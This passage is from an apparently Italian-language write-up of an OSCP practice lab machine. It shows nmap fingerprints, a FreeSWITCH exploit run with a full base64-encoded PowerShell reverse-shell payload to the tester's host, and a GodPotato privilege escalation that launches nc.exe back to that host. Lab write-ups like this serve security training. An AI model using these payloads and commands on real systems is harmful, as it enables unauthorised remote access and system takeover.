SF:20Request\r\nSec-WebSocket-Version:\x2013\r\n\r\n")%r(HTTPOptions,37,"H
SF:TTP/1\.1\x20400\x20Bad\x20Request\r\nSec-WebSocket-Version:\x2013\r\n\r
SF:\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8082-TCP:V=7.94SVN%T=SSL%I=7%D=1/6%Time=677BB420%P=aarch64-unknown-
SF:linux-gnu%r(GenericLines,37,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nSec-
SF:WebSocket-Version:\x2013\r\n\r\n")%r(GetRequest,37,"HTTP/1\.1\x20400\x2
SF:0Bad\x20Request\r\nSec-WebSocket-Version:\x2013\r\n\r\n")%r(HTTPOptions
SF:,37,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nSec-WebSocket-Version:\x2013
SF:\r\n\r\n");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Port 80

016.png

Exploit

Per il servizio FreeSWITCH esiste l'exploit 47799. Apro un listener sulla porta 4444 ed eseguo l'exploit:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Gust]
└─$ python3 47799py 192.168.149.151 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIANAA4ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=='
Authenticated
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Gust]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.149.151] 50202

PS C:\Program Files\FreeSWITCH> whoami
oscp\chris

Infine catturo la flag local.txt:

017.png

Privilege Escalation

Verifico i privilegi dell'utente chris:

PowerShell
PS C:\users\chris\desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
PS C:\users\chris\desktop>

Provo a sfruttare il privilegio SeImpersonatePrivilege. Carico i file necessari. Eseguo apro una reverse shelll sulla porta 4444 tramite GodPotato:

PowerShell
PS C:\users\chris\desktop\wintools> .\GodPotato-NET4.exe -cmd "cmd /c C:\users\chris\desktop\wintools\nc.exe 192.168.45.248 4444 -e cmd"

Infine recupero la flag proof.txt:

018.png